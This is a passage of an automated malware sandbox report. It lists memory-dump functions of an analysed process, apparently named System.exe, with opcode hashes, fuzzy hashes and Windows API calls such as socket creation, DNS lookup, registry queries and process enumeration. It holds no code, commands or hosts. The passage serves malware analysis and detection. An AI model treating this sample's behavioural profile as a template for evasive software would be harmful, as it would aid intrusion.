Source File: 00000004.00000002.301963762.00000000008BA000.00000040.00000001.sdmp, Offset: 008BA000, based on PE: false

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 50075748f7b0f79d2a2523917368809ba0b7daeba0f5622607cf6f00e8a4c5ea
Instruction ID: 6f7524869546358767543dc12fc931e6f6bf584e670cf40cd7808b1dfd70ab6d
Opcode Fuzzy Hash: 50075748f7b0f79d2a2523917368809ba0b7daeba0f5622607cf6f00e8a4c5ea
Instruction Fuzzy Hash: F9F0AF35804284CFDB21CF19D9887A5FFE4EF08725F58C09ADD498B316D275A408CAA3

Uniqueness

Uniqueness Score: -1.00%

Function 02490230, Relevance: .5, Instructions: 546COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.302076099.0000000002490000.00000040.00000001.sdmp, Offset: 02490000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eec9d5e3a6ec2117a67cf76d84e4df3f44438fa45788fd476b599bf8b9b5e83a
Instruction ID: e56b273c980af843b70bfc326ddfe4bd584d8de6578771e2bbb5d527dd7a641f
Opcode Fuzzy Hash: eec9d5e3a6ec2117a67cf76d84e4df3f44438fa45788fd476b599bf8b9b5e83a
Instruction Fuzzy Hash: 3D12D330700A41CFEB19EB78D458A6D37E7BB88304F1548A9D9069B3A9EF799C42CB51

Uniqueness

Uniqueness Score: -1.00%

Function 02490222, Relevance: .3, Instructions: 285COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.302076099.0000000002490000.00000040.00000001.sdmp, Offset: 02490000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b05ede2949027fe481533d5eacc8994930fa36f430a358632eeb50465d2163ce
Instruction ID: 83e33327482631ef3770c3fed056aa2873b00185d4002bf75ac6653d2f9861e4
Opcode Fuzzy Hash: b05ede2949027fe481533d5eacc8994930fa36f430a358632eeb50465d2163ce
Instruction Fuzzy Hash: 7EB1A034700A00CFEB19EB78D458A6E77F6BB88755F1544A9D8029B3A9DF369C42CB50

Uniqueness

Uniqueness Score: -1.00%

Function 024902CD, Relevance: .2, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.302076099.0000000002490000.00000040.00000001.sdmp, Offset: 02490000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1c57813d280f301b1fa1da8c582261d52f053c83c084eb76843eaeccf78cc98
Instruction ID: b5f4438ccc58e418efd9ab771813966300fabcb46e9fd04eaa162f0dece9cb97
Opcode Fuzzy Hash: f1c57813d280f301b1fa1da8c582261d52f053c83c084eb76843eaeccf78cc98
Instruction Fuzzy Hash: EE919134700E10CFEB19EB78E458A6D77E3BB88745B1544A9D802DB3A9DF3A9C42CB51

Uniqueness

Uniqueness Score: -1.00%

Function 02490378, Relevance: .2, Instructions: 235COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.302076099.0000000002490000.00000040.00000001.sdmp, Offset: 02490000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cba0061439fe6512614b87802ea336e32b42cdf8093e6202dc29f10c21a5843
Instruction ID: 6088c7c5d2e8214a11c2c98935a180bdc8f2cfb4f770b3056033020309bd397d
Opcode Fuzzy Hash: 2cba0061439fe6512614b87802ea336e32b42cdf8093e6202dc29f10c21a5843
Instruction Fuzzy Hash: 4691B334700E01CFEB19EB78E458A6D77E3BB88745B1544A9D802EB3A9DF399C42CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0249030F, Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.302076099.0000000002490000.00000040.00000001.sdmp, Offset: 02490000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf69f51953dbd37165f81e25d1677fe4e6322137a34b31ed2b355fd52587b543
Instruction ID: cae41a1b0da4907c85ce016694e7ab5fa2ae6aad150ffd08a6eacef310a9adbf
Opcode Fuzzy Hash: cf69f51953dbd37165f81e25d1677fe4e6322137a34b31ed2b355fd52587b543
Instruction Fuzzy Hash: 31819234700E00CFEB15EB78E458A6D77E3BB88745B1544A9D902DB3A9DF3A9C42CB51

Uniqueness

Uniqueness Score: -1.00%

Function 02490006, Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.302076099.0000000002490000.00000040.00000001.sdmp, Offset: 02490000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ed19e04d83459c296dad1a08a407d6c753c853b561b8c5e9e860abc37b92dfb
Instruction ID: 4e0aa40d78c0667c7e3adbea1f42ca913d0d1b31710d9f58da8276dcd5b9698d
Opcode Fuzzy Hash: 6ed19e04d83459c296dad1a08a407d6c753c853b561b8c5e9e860abc37b92dfb
Instruction Fuzzy Hash: FF515B30519EC68FD307EB78EA958893FB1FF82304B1588DAD0448B26BDB345D0ADB52

Uniqueness

Uniqueness Score: -1.00%

Function 025505CF, Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.302087256.0000000002550000.00000040.00000040.sdmp, Offset: 02550000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4e05f7f025a4534d75678373789e195ab22be4e6c87d3d80df34852c762110e
Instruction ID: 49afb218cc76bd9ba978b5199a6baf27713590a72343664262e4a70ec9ef465a
Opcode Fuzzy Hash: e4e05f7f025a4534d75678373789e195ab22be4e6c87d3d80df34852c762110e
Instruction Fuzzy Hash: 6501D6B250D3846FD7128B16DD40C62FFA8EF86620709C0DBEC898B612D125B905CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 025505F6, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.302087256.0000000002550000.00000040.00000040.sdmp, Offset: 02550000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25a0557e46c3135e510ff319c2bb30e50f83ec171c7355a9e2fbc1d8b28a98d6
Instruction ID: 609c9d03118dd8b6901d517e696feb26d433626e042ffa247e7c2c77853554fa
Opcode Fuzzy Hash: 25a0557e46c3135e510ff319c2bb30e50f83ec171c7355a9e2fbc1d8b28a98d6
Instruction Fuzzy Hash: 50E09276A446008BD650CF0AED41852FBD8EB84631718C07FDC0D8B701E535B505CFA6

Uniqueness

Uniqueness Score: -1.00%

Function 008B23F4, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.301959278.00000000008B2000.00000040.00000001.sdmp, Offset: 008B2000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c37f310b48543a2c6e60bada7ae4168977848c84b492567e53241e8e61f85024
Instruction ID: 4e4cb55648ca92b869fb50fcfa98e51632fbdc6abb93c6caceb8b279f28ba437
Opcode Fuzzy Hash: c37f310b48543a2c6e60bada7ae4168977848c84b492567e53241e8e61f85024
Instruction Fuzzy Hash: C9D05E79205AC14FD326CA1CC2A8BD63F94FF51B05F4644F9E800CBB63C368D981D200

Uniqueness

Uniqueness Score: -1.00%

Function 008B23BC, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.301959278.00000000008B2000.00000040.00000001.sdmp, Offset: 008B2000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2646a011e0be6cf3f901810c15c6af6f5874733e687dc6eaf74ccfc3717570e5
Instruction ID: 062bc3de941f73849732e9a0ea8ecefdbc5e89839d4863e8771311b7813bbf66
Opcode Fuzzy Hash: 2646a011e0be6cf3f901810c15c6af6f5874733e687dc6eaf74ccfc3717570e5
Instruction Fuzzy Hash: 11D05E342002814BC726DB0CC698F9937D4FB45B00F0644E8AC00CB372C7B9DCC1C600

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: System.exe PID: 5712 Parent PID: 4472 System.exeCOMMON

Executed Functions

Function 04C01D37, Relevance: 1.6, APIs: 1, Instructions: 64nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL ref: 04C01DAD

Memory Dump Source

Source File: 00000008.00000002.560873604.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: false

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 39961bb48a97050817dc14468387645530951b37ef13cabb7a5f13a8c6e85687
Instruction ID: 0e4e949291d600b3355df9781d7fb01bb3ff9a51431040192d7cd2c63b35ee81
Opcode Fuzzy Hash: 39961bb48a97050817dc14468387645530951b37ef13cabb7a5f13a8c6e85687
Instruction Fuzzy Hash: A8219D754097C0AFDB238F21DC45A52FFB4EF16314F0980DBE9844B1A3D266A519DB62

Uniqueness

Uniqueness Score: -1.00%

Function 04C01D72, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL ref: 04C01DAD

Memory Dump Source

Source File: 00000008.00000002.560873604.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: false

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 00c2b6c2b238ab3383b4bafdc6a9f5dce5ba480591756e7cbccf230d34fd0591
Instruction ID: 04bc47307176da6ff517c29a74ff1b72e5a9af83e1e6e572ff6bf44eb4e90a5f
Opcode Fuzzy Hash: 00c2b6c2b238ab3383b4bafdc6a9f5dce5ba480591756e7cbccf230d34fd0591
Instruction Fuzzy Hash: 510178355003409FDB228F06D988B61FBA4EF08720F08C49ADE890B652D676A518DB62

Uniqueness

Uniqueness Score: -1.00%

Function 04BA0EC0, Relevance: 4.0, Strings: 3, Instructions: 220COMMON

Download Yara Rule

Strings

X1q, xrefs: 04BA1030
X1q, xrefs: 04BA10C4
X1q, xrefs: 04BA110D

Memory Dump Source

Source File: 00000008.00000002.560846130.0000000004BA0000.00000040.00000001.sdmp, Offset: 04BA0000, based on PE: false

Similarity

API ID:
String ID: X1q$X1q$X1q
API String ID: 0-789225177
Opcode ID: 4aaf6c5bc973ae7e599985285a4dc61095a9eaec25ef1a0a800251bc5984a7cd
Instruction ID: b667721dc6e39f9454052f7a918c7ba99a83ada5934178a32af371b93b13c259
Opcode Fuzzy Hash: 4aaf6c5bc973ae7e599985285a4dc61095a9eaec25ef1a0a800251bc5984a7cd
Instruction Fuzzy Hash: A8817D307042008FD758EB79C958B6E7AE2AF89300F648969E5069F3A6DF71AC01CB91

Uniqueness

Uniqueness Score: -1.00%

Function 04C00A97, Relevance: 1.6, APIs: 1, Instructions: 100registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E2C,?,?), ref: 04C00B5E

Memory Dump Source

Source File: 00000008.00000002.560873604.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 27887c7dfe47f2608f9be8ab4643995a911ea3edec8644c294f9efe26672ac62
Instruction ID: 482960178c08cbfd08744774fee021661152c92c364b945939bf7abb6b34880d
Opcode Fuzzy Hash: 27887c7dfe47f2608f9be8ab4643995a911ea3edec8644c294f9efe26672ac62
Instruction Fuzzy Hash: A931617500E3C06FD3138B258C61A61BF74EF47614B0E85CBD8C49F5A3D629A919D7B2

Uniqueness

Uniqueness Score: -1.00%

Function 04C016C4, Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(?,00000E2C), ref: 04C0178B

Memory Dump Source

Source File: 00000008.00000002.560873604.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: false

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: 09ffceb4252e6b23b45fa410cd6ca3e342f8e7e7452e6464ab24e332ad3c0c58
Instruction ID: a357f0f3625648596be8c2aa316d410fbe35fe17663e8fc2fc30a4a0bc9709a6
Opcode Fuzzy Hash: 09ffceb4252e6b23b45fa410cd6ca3e342f8e7e7452e6464ab24e332ad3c0c58
Instruction Fuzzy Hash: 0831B371100344BFEB22DF25CC85FA6FBACEB05310F14859AFA859B182D675A948CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 04C00FB0, Relevance: 1.6, APIs: 1, Instructions: 89COMMON

Download Yara Rule

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000E2C), ref: 04C01047

Memory Dump Source

Source File: 00000008.00000002.560873604.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: false

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: b841f33ab57703e36ca99f08df15128c05e8540cd5a003a0247213a34408ef6c
Instruction ID: 2901a2a9778e6217677f08502e25dcc8e529df75258c670eb94624d67a59db64
Opcode Fuzzy Hash: b841f33ab57703e36ca99f08df15128c05e8540cd5a003a0247213a34408ef6c
Instruction Fuzzy Hash: F63184725043846FE722CF25DC45F66BFACEF05310F0884AAE984DB152D665A904CB61

Uniqueness

Uniqueness Score: -1.00%

Function 04C01248, Relevance: 1.6, APIs: 1, Instructions: 87fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNELBASE ref: 04C012FA

Memory Dump Source

Source File: 00000008.00000002.560873604.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: false

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: e2021030da09bd43e96a623c435c606c6a17140e31bb6eac1767e606a1296179
Instruction ID: 92a56d00f0744c4d10da072dc017f58f8073dac6b3f5eb767ebebdb5a6066f8c
Opcode Fuzzy Hash: e2021030da09bd43e96a623c435c606c6a17140e31bb6eac1767e606a1296179
Instruction Fuzzy Hash: C731C771404780AFE722CF55DD45F56FFF8EF06310F04859AE9849B292D365A509CB61

Uniqueness

Uniqueness Score: -1.00%

Function 04C01896, Relevance: 1.6, APIs: 1, Instructions: 86windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNELBASE(?,00000E2C,?,?), ref: 04C01946

Memory Dump Source

Source File: 00000008.00000002.560873604.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: false

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: 83e85fda6503a62450add3442f1a174c43e1fc2acb08319110d49fb215af012b
Instruction ID: 188bc0b98209ef4b5cacce379a08d433c2e4fc5f87ead7ec2982b005ab98b872
Opcode Fuzzy Hash: 83e85fda6503a62450add3442f1a174c43e1fc2acb08319110d49fb215af012b
Instruction Fuzzy Hash: 9731AE7140D3C46FD7038B258C51B66BFB4EF87610F0A80CBD884CF2A3E6246919C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 04C016E6, Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(?,00000E2C), ref: 04C0178B

Memory Dump Source

Source File: 00000008.00000002.560873604.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: false

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: a09c9b29aa281263884b9bd67a751145642f5e7193559d59a279470341a6003f
Instruction ID: 189c6832dfc8c42f7ad900c94b940925e5630680fa297f268035d5818070fb97
Opcode Fuzzy Hash: a09c9b29aa281263884b9bd67a751145642f5e7193559d59a279470341a6003f
Instruction Fuzzy Hash: FC21A371500204AFFB21DF69CD85FAAFBACEF04710F14895AEE459B182D675A5088BB1

Uniqueness

Uniqueness Score: -1.00%

Function 04C015D0, Relevance: 1.6, APIs: 1, Instructions: 79timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNELBASE(?,00000E2C,89BB9157,00000000,00000000,00000000,00000000), ref: 04C01659

Memory Dump Source

Source File: 00000008.00000002.560873604.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: false

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: 53bd78a91d90b9eb7c68769331504e6bab3353b400c2c8c4a30851e74b29ede8
Instruction ID: faaec87b32420d2e5a8641e956ef095fbc14db2b13ff9c86afc9e120e35cf22f
Opcode Fuzzy Hash: 53bd78a91d90b9eb7c68769331504e6bab3353b400c2c8c4a30851e74b29ede8
Instruction Fuzzy Hash: 3E21B571105380AFEB22CF25DD45F67FFB8EF46310F08849AE9859B152D635A548CB61

Uniqueness

Uniqueness Score: -1.00%

Function 04C01166, Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 04C011F1

Memory Dump Source

Source File: 00000008.00000002.560873604.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: false

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: a3d23ba6d03ecb4c52e1bc55526119eb367969b7e25f7238b81434129decea41
Instruction ID: 7e924fcd7ed1a104adee2a6c8be6351e3c97f11792077a733bc0806f61935ddd
Opcode Fuzzy Hash: a3d23ba6d03ecb4c52e1bc55526119eb367969b7e25f7238b81434129decea41
Instruction Fuzzy Hash: CB219171505380AFE722CF25DC45F66FFA8EF45320F08849EED859B292D275A908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 04C00B8A, Relevance: 1.6, APIs: 1, Instructions: 77networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 04C00C16

Memory Dump Source

Source File: 00000008.00000002.560873604.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: false

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: 803e3efedb238f4a61bf452e5ee38d0609a24ca924f1a30aa1a7bc942e2744bf
Instruction ID: 5945a8c7114ea3ad5efac28d4db47a0178501d031d9959d36573080ee7b4dd46
Opcode Fuzzy Hash: 803e3efedb238f4a61bf452e5ee38d0609a24ca924f1a30aa1a7bc942e2744bf
Instruction Fuzzy Hash: 07219F71405380AFE722CF65DD45F66FFB9EF05310F08849EE9859B292D375A508CB62

Uniqueness

Uniqueness Score: -1.00%

Function 04C00FD6, Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000E2C), ref: 04C01047

Memory Dump Source

Source File: 00000008.00000002.560873604.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: false

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: 875aa78bad823f46d37c9cd30051b24d4037a45442e6e7bd625a18a3add3240c
Instruction ID: 2cc2694a84a0bc728d960699f8c8427526e2906203be6b0f69771b343a2dc4dd
Opcode Fuzzy Hash: 875aa78bad823f46d37c9cd30051b24d4037a45442e6e7bd625a18a3add3240c
Instruction Fuzzy Hash: AF21C672600244AFEB21DF29DD85F6AFB9CEF04314F18C46AED85DB282D675E5048BB1

Uniqueness

Uniqueness Score: -1.00%

Function 04C00EBE, Relevance: 1.6, APIs: 1, Instructions: 76registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E2C,89BB9157,00000000,00000000,00000000,00000000), ref: 04C00F5C

Memory Dump Source

Source File: 00000008.00000002.560873604.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 22411ff05ea0b02927d28b27916a3a022313aca51168938f6c6d55539fedf109
Instruction ID: 0e00e11bef134f7fb40dc0ec5d60d9f70edfdb9e7b7e130bb63f3d054dcd34cc
Opcode Fuzzy Hash: 22411ff05ea0b02927d28b27916a3a022313aca51168938f6c6d55539fedf109
Instruction Fuzzy Hash: 6B219F72508780AFE722CB15DD45F66BFB8AF45310F09C49AE9859B292D324E908CB71

Uniqueness

Uniqueness Score: -1.00%

Function 04C00922, Relevance: 1.6, APIs: 1, Instructions: 70fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,00000E2C,89BB9157,00000000,00000000,00000000,00000000), ref: 04C009A1

Memory Dump Source

Source File: 00000008.00000002.560873604.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: false

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 3f22be8dd5d3871742f3ff627d8f3ac2bec5e9ec1b45ac91eebf108812a070e8
Instruction ID: 639d234ddd6e309dc252884e978cdb09cdeea2914ff7bdef992ce259d5cf8ec1
Opcode Fuzzy Hash: 3f22be8dd5d3871742f3ff627d8f3ac2bec5e9ec1b45ac91eebf108812a070e8
Instruction Fuzzy Hash: E7219271405384AFEB22CF55DD45F66FFB8EF45310F08849BEA849B152D234A508CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 04C01186, Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 04C011F1

Memory Dump Source

Source File: 00000008.00000002.560873604.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: false

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: ba3bd4bf707042bc13667747e089e3b6daaf2a908427084c76f8fe58f9e64c47
Instruction ID: c8a82337a2ae775827e33b24cf2ed57b46fd1c78b2b8c3bf67c321e75f56e695
Opcode Fuzzy Hash: ba3bd4bf707042bc13667747e089e3b6daaf2a908427084c76f8fe58f9e64c47
Instruction Fuzzy Hash: A521F371500240AFEB21DF69CD85B66FBE8EF04320F08C46AED858B282D671B504CB75

Uniqueness

Uniqueness Score: -1.00%

Function 04C01286, Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNELBASE ref: 04C012FA

Memory Dump Source

Source File: 00000008.00000002.560873604.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: false

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 319567f64d1ed99c30bd857b2a97f1f745d22e23a46990d603fe50e56b28db82
Instruction ID: 1ae5fadd6e230ce07a31e1a8ec44eb657fec143ade5342612ec1447f25b08b96
Opcode Fuzzy Hash: 319567f64d1ed99c30bd857b2a97f1f745d22e23a46990d603fe50e56b28db82
Instruction Fuzzy Hash: B021F371100240AFE722CF59CD45FA6FBE8EF08310F08845EE9849B681D772B508CB75

Uniqueness

Uniqueness Score: -1.00%

Function 04C00BAA, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 04C00C16

Memory Dump Source

Source File: 00000008.00000002.560873604.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: false

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: 072b7c0fe9a2bfeb01f056c2b04613e3c7d50f2526b281620ddb40f5248ff945
Instruction ID: 8e19656feb13683ba66f0954b155ea5a4e06a73b23366e23daa28ed7c52b1f5c
Opcode Fuzzy Hash: 072b7c0fe9a2bfeb01f056c2b04613e3c7d50f2526b281620ddb40f5248ff945
Instruction Fuzzy Hash: A821CF71500244AFEB22DF69DD45B66FBE9EF04310F14846EE9858B292D371B504CB62

Uniqueness

Uniqueness Score: -1.00%

Function 04C00EEA, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E2C,89BB9157,00000000,00000000,00000000,00000000), ref: 04C00F5C

Memory Dump Source

Source File: 00000008.00000002.560873604.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 245535495034948e371c903b703216fab8bd5b355796fe45580db080b30ee90b
Instruction ID: b2a916f1d60d23e32bb5538969574949306c8d14f3d50adbd79eb9c119cb2e4f
Opcode Fuzzy Hash: 245535495034948e371c903b703216fab8bd5b355796fe45580db080b30ee90b
Instruction Fuzzy Hash: BB116A72500600AEEB21CE16ED85F66FBE8EF04720F08C46AE9459B292D660F508DBB1

Uniqueness

Uniqueness Score: -1.00%

Function 04C015FA, Relevance: 1.6, APIs: 1, Instructions: 64timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNELBASE(?,00000E2C,89BB9157,00000000,00000000,00000000,00000000), ref: 04C01659

Memory Dump Source

Source File: 00000008.00000002.560873604.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: false

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: 23f4a94cf448eacbcfb0a8443112660caa6991bbc732f55ca5c134d8a2cab1dd
Instruction ID: b187da160d72447d2a672e8a12c191639e2fa633775b7a15ef6c6b7baee2b282
Opcode Fuzzy Hash: 23f4a94cf448eacbcfb0a8443112660caa6991bbc732f55ca5c134d8a2cab1dd
Instruction Fuzzy Hash: E111B272500200AFEB22CF65DE45F6AFBA8EF44720F18C46AED459B291D675A904CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 04C01C8C, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

K32EnumProcesses.KERNEL32(?,?,?,89BB9157,00000000,?,?,?,?,?,?,?,?,72733C38), ref: 04C01CEE

Memory Dump Source

Source File: 00000008.00000002.560873604.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: false

Similarity

API ID: EnumProcesses
String ID:
API String ID: 84517404-0
Opcode ID: 4be238d5cd3a34dca0fc8d1c7c43ddb208b00d9d4575caa3bcee7ed32f1e3c25
Instruction ID: 2a312f1bdedaca9295587f1d7ec6be00b0269e6b85bc0af762043a9e91fb2a1c
Opcode Fuzzy Hash: 4be238d5cd3a34dca0fc8d1c7c43ddb208b00d9d4575caa3bcee7ed32f1e3c25
Instruction Fuzzy Hash: 1C11AF715053849FDB22CF65DC84B52FFE8EF05220F08C4AAED858B2A2D235A908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 04C00942, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,00000E2C,89BB9157,00000000,00000000,00000000,00000000), ref: 04C009A1

Memory Dump Source

Source File: 00000008.00000002.560873604.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: false

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 4cc2912422d48d96fbc439dbd340f878361bcffac3b3b80096d64c7251aec5ec
Instruction ID: d03537b2e325feb98ffb712e0325b1b9ab0beac13744cd049a4147c812cd4028
Opcode Fuzzy Hash: 4cc2912422d48d96fbc439dbd340f878361bcffac3b3b80096d64c7251aec5ec
Instruction Fuzzy Hash: AF11A771500344AFEB22CF56DE45F6AFBA8EF44720F14C46AEE459B251D374A504CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 04C0197C, Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

K32EmptyWorkingSet.KERNEL32(?,?,89BB9157,00000000,?,?,?,?,?,?,?,?,72733C38), ref: 04C019D3

Memory Dump Source

Source File: 00000008.00000002.560873604.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: false

Similarity

API ID: EmptyWorking
String ID:
API String ID: 3204950828-0
Opcode ID: 0e5131afecd7f8e79e95f5f2094d3216844cbb9e0d1a6323e1ee9b1694e8b5f2
Instruction ID: 17100a93e104574d53975cee52bfed6f89779a159100f40b8c604da703a043a5
Opcode Fuzzy Hash: 0e5131afecd7f8e79e95f5f2094d3216844cbb9e0d1a6323e1ee9b1694e8b5f2
Instruction Fuzzy Hash: 1411C6755057C09FD7128F15DC45A52FFB4EF06320F0980AEED858B2A2D279A918CB62

Uniqueness

Uniqueness Score: -1.00%

Function 04C01CAE, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

K32EnumProcesses.KERNEL32(?,?,?,89BB9157,00000000,?,?,?,?,?,?,?,?,72733C38), ref: 04C01CEE

Memory Dump Source

Source File: 00000008.00000002.560873604.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: false

Similarity

API ID: EnumProcesses
String ID:
API String ID: 84517404-0
Opcode ID: a193a53175a44417d743b0fe2f57ff602e1eba0aff5d670f147a0a440790dd90
Instruction ID: f34eafe90212b340c3310df483bd2edcd7b02084e47e17284c2305f3db2f0f0e
Opcode Fuzzy Hash: a193a53175a44417d743b0fe2f57ff602e1eba0aff5d670f147a0a440790dd90
Instruction Fuzzy Hash: B611C0356003449FDB11CF6AD984B66FBE8EF04320F0CC4AADD49CB292D631E508CB62

Uniqueness

Uniqueness Score: -1.00%

Function 04C018F6, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNELBASE(?,00000E2C,?,?), ref: 04C01946

Memory Dump Source

Source File: 00000008.00000002.560873604.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: false

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: 9a176191fbfa1ef30784a7b95f0037e6d93c649c94ae3325b07ee51a6e6f391d
Instruction ID: 516394e0d59d19404d9daada8f8e15ff7b7911b7a8c428d865b2ac3a5b238f0e
Opcode Fuzzy Hash: 9a176191fbfa1ef30784a7b95f0037e6d93c649c94ae3325b07ee51a6e6f391d
Instruction Fuzzy Hash: 80017175500204ABD750DF1ADC86F36FBA8EB88B20F14C56AED089B741E631B915CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 04C00B0E, Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E2C,?,?), ref: 04C00B5E

Memory Dump Source

